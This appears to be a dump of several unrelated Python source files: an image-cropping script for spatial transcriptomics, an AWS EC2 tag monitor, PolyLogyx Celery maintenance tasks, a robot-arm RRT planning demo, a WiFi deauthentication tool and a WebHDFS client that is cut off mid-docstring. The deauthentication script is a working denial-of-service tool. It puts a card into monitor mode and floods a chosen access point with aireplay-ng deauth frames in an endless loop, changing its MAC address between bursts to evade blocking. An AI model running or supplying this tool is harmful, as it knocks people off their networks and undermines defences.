shutil.copy2(src=path_to_dir + stdata_filename, dst=dir_name + "/stdata.tsv")
def create_image_subfolders_in_new_mandalay_data_folders(path_to_dir):
'''
`create_image_subfolders_in_new_mandalay_data_folders`
this creates an "/images" folder inside each biposy folder
it will be used to keep the smaller images cut from the large biposy image using the spots files (this is all invoked
from `create_smaller_images_from_large_image_in_mandalay_data`)
'''
print(f'\n\nentered: create_image_subfolders_in_new_mandalay_data_folders')
subdir_list = [subdir for root, subdir, files in os.walk(path_to_dir, topdown=True)][0]
print(subdir_list)
# create an images folder under every subdir
for subdir in subdir_list:
print(subdir)
create_smaller_images_from_large_image_in_mandalay_data(path_to_dir=path_to_dir + subdir) # assumption: there's a "/" between the 2 concatanated strings
def create_smaller_images_from_large_image_in_mandalay_data(path_to_dir):
'''
`create_smaller_images_from_large_image_in_mandalay_data`
Function to create smaller images from a larger biposy image.
this is done using the spots file.
'''
print("\n----- entered function create_smaller_images_from_large_image_in_mandalay_data -----")
print(f' given path: {path_to_dir}')
# data points(x,y coordinate) for the tissue
path1 = path_to_dir + "/spots.csv"
positions_dataframe = pd.read_csv(path1)
positions_dataframe.columns = ['index', 'x', 'y']
# print(positions_dataframe) # TODO: important ! comment this later
# print(f'path1:\n {path1}')
## import image: comes with BGR
path2 = path_to_dir + "/original_image.jpg"
# print(f'path2:\n {path2}')
img = cv2.imread(path2)
print(f'img.type {type(img)} ')
print(f'img.shape {img.shape} ')
# output path
out_path = path_to_dir + "/images/"
# crate the output folder if it doesnt exists
import os
if not os.path.exists(out_path):
os.makedirs(out_path)
## TODO - get from "scalefactors_json" file. (leon's note)
# diameter & diameter for image
# NOTE: when "spot_diameter_fullres = 177.482" is given - the output image's size will be 176x176
spot_diameter_fullres = 177.4829519178534
spot_radius = int(spot_diameter_fullres/2)
# num of iterations
total_amount_of_spots = len(positions_dataframe.index)
for idx, row in positions_dataframe.iterrows():
#
barcode = row['index']
x = round(row['x'])
y = round(row['y'])
#file names
square_file_name = "{}_x{}_y{}_square.png".format(barcode,x,y) # previously: '{}_x{}_y{}_{}_square.png'.format(idx,x,y,barcode)
#print progress
print(f'processing image {idx + 1} of {total_amount_of_spots} with name: {square_file_name}', end='\r')
# square image
roi_square = img[y-spot_radius:y+spot_radius, x-spot_radius:x+spot_radius]
# plt.imshow(roi_square)
cv2.imwrite(out_path + square_file_name, roi_square)
pass
print(f'\nfinished cutting the big image')
print("\n----- finished function create_smaller_images_from_biopsy_sample -----")
def create_stdata_file_from_mtx(path_to_10x_genomics_data_dir: str = None):
'''
`create_stdata_file_from_mtx`
This function is used to reformat the stdata files from the 10x genomics version, to the mandalay version
after this function is done, a new `stdata.tsv` file is created, and the 3 older files:
features.tsv, barcodes.tsv, matrix.mtx - are no longer needed.
NOTE: assumption: the structure of the 10x genomics files:
main folder -> patient 1 (or 2) folder -> 3 files: features, barcodes, matrix.
NOTE: the final new stdata file is saved in the same subfolders of the 10x genomics father folder
'''
if path_to_10x_genomics_data_dir is None:
path_patient1_files = "C:/Users/royru/Downloads/new data STDL project from mandalay/patient1"
path_patient2_files = "C:/Users/royru/Downloads/new data STDL project from mandalay/patient2"
else:
path_patient1_files = path_to_10x_genomics_data + "/patient1"
path_patient2_files = path_to_10x_genomics_data + "/patient2"
####
for path_to_mtx_tsv_files_dir in [path_patient1_files, path_patient2_files]:
print("started reading features.tsv")
path_to_features = path_to_mtx_tsv_files_dir + "/features.tsv"
features_dataframe = pd.read_csv(path_to_features, sep='\t', header=None)
features_dataframe.columns = ['feature_ids', 'gene_names', 'feature_types'] # giving columns their names
print("V finished reading features.tsv")
print("started reading barcodes.tsv")
path_to_barcodes = path_to_mtx_tsv_files_dir + "/barcodes.tsv"
barcodes_dataframe = pd.read_csv(path_to_barcodes, sep='\t', header=None)
barcodes_dataframe.columns = ['barcodes'] # giving columns their names
print("V finished reading barcodes.tsv")
barcodes = barcodes_dataframe['barcodes'].tolist()
print("started reading matrix.mtx. this might take some time ...")
path_to_matrix = path_to_mtx_tsv_files_dir + "/matrix.mtx"
matrix = scipy.io.mmread(path_to_matrix)
matrix_dataframe = pd.DataFrame.sparse.from_spmatrix(
matrix) # NOTE: from: https://pandas.pydata.org/docs/user_guide/sparse.html
print("V finished reading matrix.mtx")
## dataframe adjusting if needed .....
# print("adjusting matrix_dataframe")
# matrix_dataframe = matrix_dataframe.replace([np.inf, -np.inf], np.nan) # replace all inf values with a NaN value
# matrix_dataframe = matrix_dataframe.fillna(0) # fill all NaN values with 0 ....
# matrix_dataframe = matrix_dataframe.astype(int) #convert value types to int
# print("V finished working on matrix_dataframe")
# update column and row names !
matrix_dataframe.index = features_dataframe.iloc[:, 0].to_list() # == feature_names_list # == rows names
matrix_dataframe.columns = barcodes_dataframe.iloc[:, 0].to_list()
# print(matrix_dataframe) # TODO: print to delete
matrix_dataframe = matrix_dataframe.transpose() # to fit the new files in the same shape
# print(matrix_dataframe) # TODO: print to delete
# finally, save the new stdata csv file
matrix_dataframe.to_csv(path_to_mtx_tsv_files_dir + "/stdata.tsv", sep = '\t')
# end of for loop
# end of function
|
<reponame>propyless/openshift-tools<filename>scripts/monitoring/ops-ec2-check-tags.py
#!/usr/bin/env python
# vim: expandtab:tabstop=4:shiftwidth=4
"""
This is a script that gathers tags from instances and reports the status of the tags to zabbix
Usage:
ops-ec2-check-tags.py --aws-creds-profile profile1 --clusterid=testcluster --region=us-east-1
"""
# Ignoring module name
# pylint: disable=invalid-name
import os
import argparse
import requests
# Reason: disable pylint import-error because our libs aren't loaded on jenkins.
# Status: temporary until we start testing in a container where our stuff is installed.
# pylint: disable=import-error
from openshift_tools.monitoring.metric_sender import MetricSender
# uncomment this for realsie
from openshift_tools.cloud.aws.instance_util import InstanceUtil
CONFIG_LOOP_TAG_KEY = 'config_loop.enabled'
class AWSTagsMonitorCLI(object):
""" Responsible for parsing cli args and running the snapshotter. """
def __init__(self):
""" initialize the class """
self.args = None
self.parse_args()
@staticmethod
def get_current_az():
""" Returns the Availability Zone that the instance is in. """
availability_zone = requests.get('http://169.254.169.254/latest/meta-data/placement/availability-zone').text
return availability_zone
@staticmethod
def get_current_region():
""" Returns the region that the instance is in. """
availability_zone = AWSTagsMonitorCLI.get_current_az()
region = availability_zone[0:-1]
return region
def parse_args(self):
""" parse the args from the cli """
parser = argparse.ArgumentParser(description='AWS Tag Checker')
parser.add_argument('--aws-creds-profile', required=False,
help='The AWS credentials profile to use.')
parser.add_argument('--clusterid', required=False,
help='The clusterid of items to check')
parser.add_argument('--dry-run', action='store_true', default=False,
help='Say what would have been done, but don\'t actually do it.')
parser.add_argument('--region', required=False,
help='The clusterid of items to check')
self.args = parser.parse_args()
def main(self):
""" main function """
if not self.args.region:
self.args.region = AWSTagsMonitorCLI.get_current_region()
if self.args.aws_creds_profile:
os.environ['AWS_PROFILE'] = self.args.aws_creds_profile
instance_util = InstanceUtil(self.args.region, True)
if self.args.clusterid:
instances = instance_util.get_all_instances_as_dict(filters={"tag:clusterid" : self.args.clusterid})
else:
instances = instance_util.get_all_instances_as_dict()
tags = []
# This will print out a list of instances
# and the tags associated with them
for v in instances.itervalues():
print v.id + ":"
for name, value in v.tags.iteritems():
print " %s: %s" %(name, value)
print
tags.append(v.tags)
print "Sending results to Zabbix:"
if self.args.dry_run:
print " *** DRY RUN, NO ACTION TAKEN ***"
else:
AWSTagsMonitorCLI.report_tags_to_zabbix(tags)
@staticmethod
def report_tags_to_zabbix(tags):
""" Sends the commands exit code to zabbix. """
mts = MetricSender(verbose=True)
#######################################################
# This reports the "config" tag from each instance
# If config ~= "true", report 0
# If config ~= "false", report 1
# If config not found, report 2
#######################################################
for tag in tags:
if 'config' in tag.keys():
if tag['config'].lower() == "true":
config_value = 0
else:
config_value = 1
else:
config_value = 2
mts.add_metric({CONFIG_LOOP_TAG_KEY : config_value}, host=tag['Name'])
####################################
# End of config tag checking
####################################
# Actually send them
mts.send_metrics()
if __name__ == "__main__":
AWSTagsMonitorCLI().main()
|
# -*- coding: utf-8 -*-
import base64
import datetime as dt
import sqlalchemy
from celery import Celery
from flask import current_app, json
from kombu import Exchange, Queue
from polylogyx.models import Settings, AlertEmail, Node, ResultLog, StatusLog, db, Alerts, CarveSession, DistributedQueryTask
from polylogyx.constants import PolyLogyxServerDefaults
celery = Celery(__name__)
default_exchange = Exchange('default', type='direct')
celery.conf.task_queues = (
Queue('worker3', default_exchange, routing_key='default'),
)
celery.conf.task_default_queue = 'worker3'
celery.conf.task_default_exchange = 'default'
celery.conf.task_default_routing_key = 'default'
celery.conf.beat_schedule = {
"send-alert-emails": {
"task": "polylogyx.tasks.send_alert_emails",
"schedule": 86400.0
}, "purge_old_data": {
"task": "polylogyx.tasks.purge_old_data",
"schedule": 86400.0
}
}
def update_sender_email(db):
emailSenderObj = db.session.query(Settings).filter(Settings.name == PolyLogyxServerDefaults.plgx_config_all_settings).first()
if not emailSenderObj:
current_app.logger.info("Email credentials are not set..")
return False
try:
settings = json.loads(emailSenderObj.setting)
emailSender = settings['email']
emailPassword = base64.decodestring(settings['password'].encode('utf-8')).decode('utf-8')
smtpPort = settings['smtpPort']
smtpAddress = settings['smtpAddress']
emailRecipients = settings['emailRecipients']
emailRecipientList = []
if emailRecipients and len(emailRecipients) > 0:
for emailRecipient in emailRecipients:
emailRecipientList.append(emailRecipient)
current_app.config['EMAIL_RECIPIENTS'] = emailRecipientList
current_app.config['MAIL_USERNAME'] = emailSender
current_app.config['MAIL_PASSWORD'] = <PASSWORD>
current_app.config['MAIL_SERVER'] = smtpAddress
current_app.config['MAIL_PORT'] = int(smtpPort)
return True
except Exception as e:
current_app.logger.info("Incomplete email credentials")
current_app.logger.error(e)
return False
@celery.task()
def send_alert_emails():
from polylogyx.models import db
current_app.logger.info("Task is started to send the pending emails of the alerts reported")
email_credentials_valid = update_sender_email(db)
if email_credentials_valid:
nodes = Node.query.all()
for node in nodes:
try:
send_pending_node_emails(node, db)
current_app.logger.info("Pending emails of the alerts reported are sent")
except Exception as e:
current_app.logger.error(e.message)
current_app.logger.info("Task is completed in sending the pending emails of the alerts reported")
@celery.task()
def purge_old_data():
from polylogyx import db
import time, datetime
current_app.logger.info("Task to purge older data is started")
try:
deleted_hosts = Node.query.filter(Node.state == Node.DELETED).all()
node_ids_to_delete = [node.id for node in deleted_hosts if not node.result_logs.count() and not node.status_logs.count()]
if node_ids_to_delete:
permanent_host_deletion.apply_async(queue='default_queue_ui_tasks', args=[node_ids_to_delete])
delete_setting = db.session.query(Settings).filter(Settings.name == 'purge_data_duration').first()
current_app.logger.info("Purging the data for the duration {}".format(int(delete_setting.setting)))
max_delete_count = 1000
actual_delete_count = 1000
if delete_setting and int(delete_setting.setting) > 0:
since = dt.datetime.now() - dt.timedelta(hours=24 * int(delete_setting.setting))
while actual_delete_count == 1000:
try:
actual_delete_count = int(ResultLog.query.filter(ResultLog.id.in_(db.session.query(ResultLog.id).filter(ResultLog.timestamp < since).limit(max_delete_count))).delete(synchronize_session='fetch'))
db.session.commit()
current_app.logger.info("Purged {0} records".format(actual_delete_count))
time.sleep(2)
except Exception as e:
db.session.commit()
current_app.logger.error("Error in Purge : {0}".format(e))
current_app.logger.info("Purging the Status Logs beyond the purge duration")
StatusLog.query.filter(StatusLog.created < since).delete()
db.session.commit()
current_app.logger.info("Purging the Alerts beyond the purge duration")
Alerts.query.filter(Alerts.created_at < since).delete()
db.session.commit()
hosts = db.session.query(Node.host_identifier, Node.id).filter(Node.state == Node.DELETED).filter(Node.updated_at < since).all()
node_ids = [item[1] for item in hosts]
permanent_host_deletion.apply_async(queue='default_queue_ui_tasks', args=[node_ids])
else:
current_app.logger.info("Deleting limit not set, skipping ")
except Exception as e:
current_app.logger.error(e)
current_app.logger.info("Task to purge older data is completed")
@celery.task()
def permanent_host_deletion(node_ids):
if node_ids:
current_app.logger.info("Hosts with ids {} are requested to delete permanently".format(node_ids))
try:
nodes = db.session.query(Node).filter(Node.id.in_(node_ids)).all()
for node in nodes:
node.tags = []
db.session.commit()
deleted_count = Node.query.filter(Node.state == Node.DELETED).filter(Node.id.in_(node_ids)).delete(synchronize_session=False)
current_app.logger.info("{} hosts are deleted permanently".format(deleted_count))
except Exception as e:
current_app.logger.error("Unable to delete tags/result_log/status_log/alert_email/alerts from the node! " + str(e))
else:
current_app.logger.info("No host is requested to delete")
db.session.commit()
def format_records(results):
result_list = []
keys = results.keys()
data_list = results.fetchall()
for data in data_list:
result = {}
for index, key in enumerate(keys):
result[key] = data[index]
result_list.append(result)
return result_list
class DecimalEncoder(json.JSONEncoder):
def default(self, o):
import decimal
if isinstance(o, decimal.Decimal):
return float(o)
return super(DecimalEncoder, self).default(o)
def send_pending_node_emails(node, db):
alert_emails = AlertEmail.query.filter(AlertEmail.node == node).filter(AlertEmail.status == None).all()
body = ''
for alert_email in alert_emails:
body = body + alert_email.body
if body:
try:
db.session.query(AlertEmail).filter(AlertEmail.status == None).filter(AlertEmail.node == node).update(
{'status': 'PENDING'})
db.session.commit()
send_email(node, body, db)
except Exception as e:
current_app.logger.error(e.message)
def send_email(node, body, db):
from polylogyx.utils import send_email
send_email(body=body, subject=node.display_name + ' Alerts Today',
config=current_app.config, node=node, db=db)
try:
db.session.query(AlertEmail).filter(AlertEmail.status == 'PENDING').filter(AlertEmail.node == node).update(
{'status': 'COMPLETED'})
db.session.commit()
except Exception as e:
current_app.logger.error(e.message)
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 15:27:04 2016
@author: alex
"""
from AlexRobotics.planning import RandomTree as RPRT
from AlexRobotics.dynamic import Hybrid_Manipulator as HM
from AlexRobotics.control import RminComputedTorque as RminCTC
import numpy as np
import matplotlib.pyplot as plt
R = HM.HybridThreeLinkManipulator()
R.x_ub[0] = np.pi
R.x_ub[1] = np.pi
R.x_ub[2] = np.pi
R.x_lb[0] = - np.pi
R.x_lb[1] = - np.pi
R.x_lb[2] = - np.pi
R.ubar = np.array([0,0,0,0])
x_start = np.array([0,0,1.5,0,0,0])
x_goal = np.array([-3,0,-1.5,0,0,0])
RRT = RPRT.RRT( R , x_start )
T = 8
u_R1 = 0
u_R2 = 1
RRT.U = np.array([[ 0,T,0,u_R1],[ 0,0,0,u_R1],[ 0,-T,0,u_R1],[ 0,0,T,u_R1],[ 0,0,-T,u_R1],[ 0,T,T,u_R1],[ 0,-T,-T,u_R1],[ 0,-T,T,u_R1],[ 0,T,-T,u_R1],
[ T,T,0,u_R1],[ T,0,0,u_R1],[ T,-T,0,u_R1],[ T,0,T,u_R1],[ T,0,-T,u_R1],[ T,T,T,u_R1],[ T,-T,-T,u_R1],[ T,-T,T,u_R1],[ T,T,-T,u_R1],
[-T,T,0,u_R1],[-T,0,0,u_R1],[-T,-T,0,u_R1],[-T,0,T,u_R1],[-T,0,-T,u_R1],[-T,T,T,u_R1],[-T,-T,-T,u_R1],[-T,-T,T,u_R1],[-T,T,-T,u_R1],
[ 0,T,0,u_R2],[ 0,0,0,u_R2],[ 0,-T,0,u_R2],[ 0,0,T,u_R2],[ 0,0,-T,u_R2],[ 0,T,T,u_R2],[ 0,-T,-T,u_R2],[ 0,-T,T,u_R2],[ 0,T,-T,u_R2],
[ T,T,0,u_R2],[ T,0,0,u_R2],[ T,-T,0,u_R2],[ T,0,T,u_R2],[ T,0,-T,u_R2],[ T,T,T,u_R2],[ T,-T,-T,u_R2],[ T,-T,T,u_R2],[ T,T,-T,u_R2],
[-T,T,0,u_R2],[-T,0,0,u_R2],[-T,-T,0,u_R2],[-T,0,T,u_R2],[-T,0,-T,u_R2],[-T,T,T,u_R2],[-T,-T,-T,u_R2],[-T,-T,T,u_R2],[-T,T,-T,u_R2]],)
RRT.dt = 0.2
RRT.goal_radius = 1.0
RRT.alpha = 0.9
RRT.max_nodes = 50000
RRT.max_solution_time = 10
# Dynamic plot
RRT.dyna_plot = True
RRT.dyna_node_no_update = 1000
RRT.find_path_to_goal( x_goal )
#RRT.animate3D_solution( 0.5 )
# Assign controller
CTC_controller = RminCTC.RminComputedTorqueController( R )
CTC_controller.load_trajectory( RRT.solution )
CTC_controller.goal = x_goal
R.ctl = CTC_controller.ctl
CTC_controller.w0 = 1.0
CTC_controller.zeta = 0.7
CTC_controller.traj_ref_pts = 'closest'
CTC_controller.n_gears = 2
""" Simulation and plotting """
# Sim
tf = RRT.time_to_goal + 5
n = int( np.round( tf / 0.01 ) ) + 1
R.computeSim( x_start , tf , n , solver = 'euler' )
# Plot
R.Sim.plot_CL('x')
R.Sim.plot_CL('u')
RRT.plot_2D_Tree()
R.animate3DSim()
# Hold figures alive
plt.show() |
<gh_stars>1-10
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Developed in Python3
# RUN WITH ROOT USER!!!
# Install NETIFACES: 'pip3 install netifaces'
"""
+-------------------------------------------------------+
| Create BY: <NAME> |
| |
| [*] AUTOR: <NAME> |
| [*] GITHUB: https://github.com/JulianPedro |
+-------------------------------------------------------+
"""
import os
import time
import subprocess
import netifaces
CYAN = '\033[96m'
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
BOLD = '\033[1m'
END = '\033[0m'
RESET='\033[1;00m'
def attack(monitor):
os.system('airodump-ng {0} --manufacturer'.format(monitor))
bssid = input(GREEN+BOLD+'DWD (attack) > Set BSSID: '+END)
essid = input(GREEN+BOLD+'DWD (attack) > Set ESSID: '+END)
channel = input(GREEN+BOLD+'DWD (attack) > Set CHANNEL: '+END)
frames = input(RED+BOLD+'DWD (attack) > Set Number Of Frames Before Mac Reset [Ex: 1000]: '+END)
start = input(GREEN+BOLD+'DWD (attack) > Start Attack [Y/N]: ')
if (start.upper() == 'Y'):
print(GREEN+BOLD+'DWD (attack) > Starting Attack in 3s! '+END)
time.sleep(3)
print(GREEN+BOLD+'DWD (attack) > Settling Channel {0}'+END).format(channel)
os.system('airodump-ng --bssid '+bssid+' --channel '+channel+' '+monitor+' 2> /dev/null &')
while True:
print(GREEN+BOLD+'DWD (attack) > Changing address MAC'+END)
os.system('ifconfig '+monitor+' down')
m = os.system('macchanger -r '+monitor+' 1> /dev/null 2> /dev/null')
os.system('ifconfig '+monitor+' up')
if m == 256:
next = input(RED+BOLD+'DWD (attack) > Error in changing adress MAC! Continue [Y/N]: '+END)
if (not(next.upper() == 'Y')):
exit()
print(RED+BOLD+'DWD (attack) > Sending '+frames+' Deauth Frames in Channel '+channel+''+END)
if (not essid):
os.system('aireplay-ng -0 '+frames+' -a '+bssid+' --ignore-negative-one '+monitor+' > /dev/null')
else:
os.system('aireplay-ng -0 '+frames+' -a '+bssid+' -e '+essid+' --ignore-negative-one '+monitor+' > /dev/null')
time.sleep(1)
else:
exit()
def mount_mode():
card = input(GREEN+BOLD+'DWD (mount_monitor_mode) > Input WiFi Card Name: '+END)
os.system('airmon-ng check kill > /dev/null')
start_monitor = 'airmon-ng start {0} > /dev/null'.format(card)
os.system(start_monitor)
faces = netifaces.interfaces()
for i in faces:
f = len(i)
f -= 3
if (i[f:] == 'mon' or i[:3] == 'mon'):
monitor = str(i)
print(RED+BOLD+'DWD (mount_monitor_mode) > Monitor Mode Enable [{0}]'+END).format(monitor)
print(GREEN+BOLD+'DWD (mount_monitor_mode) > Redirecting Run Attack'+END)
print(RED+BOLD+'DWD (attack) > Press Ctrl+C To Select The Network'+END)
time.sleep(5)
attack(monitor)
return monitor
def set_mode():
monset = input(GREEN+BOLD+'DWD (set_monitor_mode) > Input Monitor Mode Name: '+END)
print(GREEN+BOLD+'DWD (mount_monitor_mode) > Redirecting Run Attack'+END)
print(RED+BOLD+'DWD (attack) > Press Ctrl+C To Select The Network'+END)
monitor = monset
time.sleep(5)
attack(monitor)
return monitor
banner = '''\033[96m \033[1m
██╗ ██╗ ██╗███████╗██╗ ██╗ ██╗██╗██╗ ██╗
██║ ██║ ██║██╔════╝██║ ██║ ██╔╝██║██║ ██║
██║ █╗ ██║ ██║█████╗ ██║ █████╔╝ ██║██║ ██║
██║███╗██║ ██║██╔══╝ ██║ ██╔═██╗ ██║██║ ██║
╚███╔███╔╝ ██║██║ ██║ ██║ ██╗██║███████╗███████╗
╚══╝╚══╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝\033[0m '''
os.system('clear')
print(banner)
time.sleep(1.5)
print('''\033[92m\033[1m
Deauth WiFi DoS With MAC Bypass - WiFi Kill - By: <NAME>
[1] - Mount Monitor Mode
[2] - Set Monitor Mode
[0] - Exit
\033[0m''')
option = int(input(GREEN+BOLD+'DWD (option) > '+END))
if option == 1:
mount_mode()
elif option == 2:
set_mode()
elif option == 0:
print(RED+BOLD+'Bye..\n'+END)
exit()
else:
print(RED+BOLD+'Value Incorret!\n'+END)
exit() |
<filename>pywebhdfs/webhdfs.py
from six.moves import http_client
import requests
try:
from urllib.parse import quote, quote_plus
except ImportError:
from urllib import quote, quote_plus
from pywebhdfs import errors, operations
class PyWebHdfsClient(object):
"""
PyWebHdfsClient is a Python wrapper for the Hadoop WebHDFS REST API
To use this client:
>>> from pywebhdfs.webhdfs import PyWebHdfsClient
"""
def __init__(self, host='localhost', port='50070', user_name=None):
"""
Create a new client for interacting with WebHDFS
:param host: the ip address or hostname of the HDFS namenode
:param port: the port number for WebHDFS on the namenode
:param user_name: WebHDFS user.name used for authentication
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
"""
self.host = host
self.port = port
self.user_name = user_name
# create base uri to be used in request operations
self.base_uri = 'http://{host}:{port}/webhdfs/v1/'.format(
host=self.host, port=self.port)
def create_file(self, path, file_data, **kwargs):
"""
Creates a new file on HDFS
:param path: the HDFS file path without a leading '/'
:param file_data: the initial data to write to the new file
The function wraps the WebHDFS REST call:
PUT http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=CREATE
[&overwrite=<true|false>][&blocksize=<LONG>][&replication=<SHORT>]
[&permission=<OCTAL>][&buffersize=<INT>]
The function accepts all WebHDFS optional arguments shown above
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_data = '01010101010101010101010101010101'
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.create_file(my_file, my_data)
Example with optional args:
>>> hdfs.create_file(my_file, my_data, overwrite=True, blocksize=64)
Or for sending data from file like objects:
>>> with open('file.data') as file_data:
>>> hdfs.create_file(hdfs_path, data=file_data)
Note: The create_file function does not follow automatic redirects but
instead uses a two step call to the API as required in the
WebHDFS documentation
"""
# make the initial CREATE call to the HDFS namenode
optional_args = kwargs
uri = self._create_uri(path, operations.CREATE, **optional_args)
init_response = requests.put(uri, allow_redirects=False)
if not init_response.status_code == http_client.TEMPORARY_REDIRECT:
_raise_pywebhdfs_exception(
init_response.status_code, init_response.content)
# Get the address provided in the location header of the
# initial response from the namenode and make the CREATE request
# to the datanode
uri = init_response.headers['location']
response = requests.put(
uri, data=file_data,
headers={'content-type': 'application/octet-stream'})
if not response.status_code == http_client.CREATED:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def append_file(self, path, file_data, **kwargs):
"""
Appends to an existing file on HDFS
:param path: the HDFS file path without a leading '/'
:param file_data: data to append to existing file
The function wraps the WebHDFS REST call:
POST http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=APPEND
[&buffersize=<INT>]
The function accepts all WebHDFS optional arguments shown above
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_data = '01010101010101010101010101010101'
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.append_file(my_file, my_data)
Example with optional args:
>>> hdfs.append_file(my_file, my_data, overwrite=True, buffersize=4096)
Note: The append_file function does not follow automatic redirects but
instead uses a two step call to the API as required in the
WebHDFS documentation
Append is not supported in Hadoop 1.x
"""
# make the initial APPEND call to the HDFS namenode
optional_args = kwargs
uri = self._create_uri(path, operations.APPEND, **optional_args)
init_response = requests.post(uri, allow_redirects=False)
if not init_response.status_code == http_client.TEMPORARY_REDIRECT:
_raise_pywebhdfs_exception(
init_response.status_code, init_response.content)
# Get the address provided in the location header of the
# initial response from the namenode and make the APPEND request
# to the datanode
uri = init_response.headers['location']
response = requests.post(
uri, data=file_data,
headers={'content-type': 'application/octet-stream'})
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def read_file(self, path, **kwargs):
"""
Reads from a file on HDFS and returns the content
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=OPEN
[&offset=<LONG>][&length=<LONG>][&buffersize=<INT>]
Note: this function follows automatic redirects
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.read_file(my_file)
01010101010101010101010101010101
01010101010101010101010101010101
01010101010101010101010101010101
01010101010101010101010101010101
"""
optional_args = kwargs
uri = self._create_uri(path, operations.OPEN, **optional_args)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.content
def make_dir(self, path, **kwargs):
"""
Create a new directory on HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
PUT http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=MKDIRS
[&permission=<OCTAL>]
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_dir = 'user/hdfs/data/new_dir'
>>> hdfs.make_dir(my_dir)
Example with optional args:
>>> hdfs.make_dir(my_dir, permission=755)
"""
optional_args = kwargs
uri = self._create_uri(path, operations.MKDIRS, **optional_args)
response = requests.put(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def rename_file_dir(self, path, destination_path):
"""
Rename an existing directory or file on HDFS
:param path: the HDFS file path without a leading '/'
:param destination_path: the new file path name
The function wraps the WebHDFS REST call:
PUT <HOST>:<PORT>/webhdfs/v1/<PATH>?op=RENAME&destination=<PATH>
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> current_dir = 'user/hdfs/data/my_dir'
>>> destination_dir = 'user/hdfs/data/renamed_dir'
>>> hdfs.rename_file_dir(current_dir, destination_dir)
"""
destination_path = '/' + destination_path.lstrip('/')
uri = self._create_uri(path, operations.RENAME,
destination=destination_path)
response = requests.put(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def delete_file_dir(self, path, recursive=False):
"""
Delete an existing file or directory from HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
DELETE "http://<host>:<port>/webhdfs/v1/<path>?op=DELETE
[&recursive=<true|false>]
Example for deleting a file:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.delete_file_dir(my_file)
Example for deleting a directory:
>>> hdfs.delete_file_dir(my_file, recursive=True)
"""
uri = self._create_uri(path, operations.DELETE, recursive=recursive)
response = requests.delete(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def get_file_dir_status(self, path):
"""
Get the file_status of a single file or directory on HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=GETFILESTATUS
Example for getting file status:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.get_file_dir_status(my_file)
{
"FileStatus":{
"accessTime":1371737704282,
"blockSize":134217728,
"group":"hdfs",
"length":90,
"modificationTime":1371737704595,
"owner":"hdfs",
"pathSuffix":"",
"permission":"755",
"replication":3,
"type":"FILE"
}
}
Example for getting directory status:
>>> my_dir = 'user/hdfs/data/'
>>> hdfs.get_file_dir_status(my_file)
{
"FileStatus":{
"accessTime":0,
"blockSize":0,
"group":"hdfs",
"length":0,
"modificationTime":1371737704208,
"owner":"hdfs",
"pathSuffix":"",
"permission":"755",
"replication":0,
"type":"DIRECTORY"
}
}
"""
uri = self._create_uri(path, operations.GETFILESTATUS)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def get_content_summary(self, path):
"""
Get the content summary of a directory on HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=GETCONTENTSUMMARY
Example for getting a directory's content summary:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_folder = 'user/hdfs/data/'
>>> hdfs.get_file_dir_status(my_folder)
{
"ContentSummary":
{
"directoryCount": 2,
"fileCount": 1,
"length": 24930,
"quota": -1,
"spaceConsumed": 24930,
"spaceQuota": -1
}
}
"""
uri = self._create_uri(path, operations.GETCONTENTSUMMARY)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def get_file_checksum(self, path):
"""
Get the file_checksum of a single file on HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=GETFILECHECKSUM
Example for getting file status:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.get_file_checksum(my_file)
{
"FileChecksum":{
"algorithm": "MD5-of-1MD5-of-512CRC32",
